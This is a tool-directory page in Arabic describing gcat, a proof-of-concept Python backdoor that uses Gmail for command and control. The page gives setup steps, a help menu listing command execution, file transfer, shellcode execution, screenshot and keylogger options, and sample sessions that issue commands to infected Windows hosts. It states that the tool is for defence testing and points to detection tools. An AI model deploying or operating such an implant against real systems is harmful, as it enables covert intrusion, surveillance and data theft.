Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
gcat — باب خلفي (PoC) يستخدم Gmail كخادم للقيادة والتحكم (C&C) | Kitploit
أدوات/GitHubGitHub/byt3bl33d3r/gcat
الاستغلالما بعد الاستغلالاختبار الاختراقالقيادة والسيطرةالفريق الأحمرتطوير الحمولاتحصان طروادة للوصول عن بعدArchived
GitHubbyt3bl33d3r/gcat

gcat

باب خلفي (PoC) يستخدم Gmail كخادم للقيادة والتحكم (C&C)

عرض المستودع
1.4k416منذ 7 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

Gcat

باب خلفي خفي مبني على Python يستخدم Gmail كخادم تحكم وقيادة

هذا المشروع مستوحى من كود PoC الأصلي لبنجامين دونلي

هذا كود PoC...

... تم إصداره للمؤسسات لاختبار دفاعاتها ضد هذا النوع من الهجمات. وللكشف عنها، انظر إلى مشاريع مثل RITA.

للحصول على نسخة أكثر حداثةً وصيانةً من هذا المشروع، راجع GDog

الإعداد

لكي يعمل هذا، تحتاج إلى:

  • حساب Gmail (استخدم حسابًا مخصصًا! لا تستخدم حسابك الشخصي!)
  • فعّل خيار "Allow less secure apps" ضمن إعدادات الأمان للحساب
  • قد تحتاج أيضًا إلى تفعيل IMAP في إعدادات الحساب

يحتوي هذا المستودع على ملفين:

  • gcat.py وهو برنامج نصي يُستخدم لسرد العملاء المتاحين وإصدار الأوامر إليهم
  • implant.py وهو الباب الخلفي الفعلي الذي سيتم نشره

في كلا الملفين، عدّل المتغيرين gmail_user و gmail_pwd ليشتملا على اسم المستخدم وكلمة المرور للحساب الذي أعددته مسبقًا.

من المحتمل أنك ستحتاج إلى تجميع implant.py إلى ملف تنفيذي باستخدام Pyinstaller

ملاحظة: يُنصح بتجميع implant.py باستخدام تثبيت Python 32-بت

الاستخدام

root@kitploit:~
                                             dP   
                                             88   
                .d8888b. .d8888b. .d8888b. d8888P 
                88'  `88 88'  `"" 88'  `88   88   
                88.  .88 88.  ... 88.  .88   88   
                `8888P88 `88888P' `88888P8   dP   
                     .88                          
                 d8888P  
                     

                   .__....._             _.....__,
                     ". : o :':         ;': o :".
                     `. `-' .'.       .'. `-' .'   
                       `---'             `---'  

             _...----...      ...   ...      ...----..._
          .-'__..-''----    `.  `"`  .'    ----'''-..__`-.
         '.-'   _.--'''       `-._.-'       ''''--._   `-.`
         '  .-"'                  :                  `"-.  `
           '   `.              _.'"'._              .'   `
                 `.       ,.-'"       "'-.,       .'
                   `.                           .'
              jgs    `-._                   _.-'
                         `"'--...___...--'"`

                     ...IM IN YUR COMPUTERZ...

                        WATCHIN YUR SCREENZ

optional arguments:
  -h, --help            show this help message and exit
  -v, --version         show program's version number and exit
  -id ID                Client to target
  -jobid JOBID          Job id to retrieve

  -list                 List available clients
  -info                 Retrieve info on specified client

Commands:
  Commands to execute on an implant

  -cmd CMD              Execute a system command
  -download PATH        Download a file from a clients system
  -upload SRC DST       Upload a file to the clients system
  -exec-shellcode FILE  Execute supplied shellcode on a client
  -screenshot           Take a screenshot
  -lock-screen          Lock the clients screen
  -force-checkin        Force a check in
  -start-keylogger      Start keylogger
  -stop-keylogger       Stop keylogger

Meow!

  • بمجرد نشر الباب الخلفي على بضعة أنظمة، يمكنك التحقق من العملاء المتاحين باستخدام أمر القائمة:
root@kitploit:~
#~ python gcat.py -list
f964f907-dfcb-52ec-a993-543f6efc9e13 Windows-8-6.2.9200-x86
90b2cd83-cb36-52de-84ee-99db6ff41a11 Windows-XP-5.1.2600-SP3-x86

المخرجات عبارة عن سلسلة UUID تعرّف النظام ونظام التشغيل الذي تعمل عليه الغرسة بشكل فريد

  • لنقم بإصدار أمر إلى غرسة:
root@kitploit:~
#~ python gcat.py -id 90b2cd83-cb36-52de-84ee-99db6ff41a11 -cmd 'ipconfig /all'
[*] Command sent successfully with jobid: SH3C4gv

هنا نطلب من 90b2cd83-cb36-52de-84ee-99db6ff41a11 تنفيذ ipconfig /all، ثم يُخرج البرنامج النصي jobid الذي يمكننا استخدامه لاسترجاع مخرجات ذلك الأمر

  • لنحصل على النتائج!
root@kitploit:~
#~ python gcat.py -id 90b2cd83-cb36-52de-84ee-99db6ff41a11 -jobid SH3C4gv     
DATE: 'Tue, 09 Jun 2015 06:51:44 -0700 (PDT)'
JOBID: SH3C4gv
FG WINDOW: 'Command Prompt - C:\Python27\python.exe implant.py'
CMD: 'ipconfig /all'


Windows IP Configuration

        Host Name . . . . . . . . . . . . : unknown-2d44b52
        Primary Dns Suffix  . . . . . . . : 
        Node Type . . . . . . . . . . . . : Unknown
        IP Routing Enabled. . . . . . . . : No
        WINS Proxy Enabled. . . . . . . . : No

-- SNIP --
  • هذا هو جوهر الأمر! لكن يمكنك فعل المزيد، كما ترى من استخدام البرنامج النصي! ;)

مهام للإنجاز

  • دعم متعدد المنصات
  • أمر رفع الملفات
  • تشفير النقل والإخفاء
تنزيل الأداة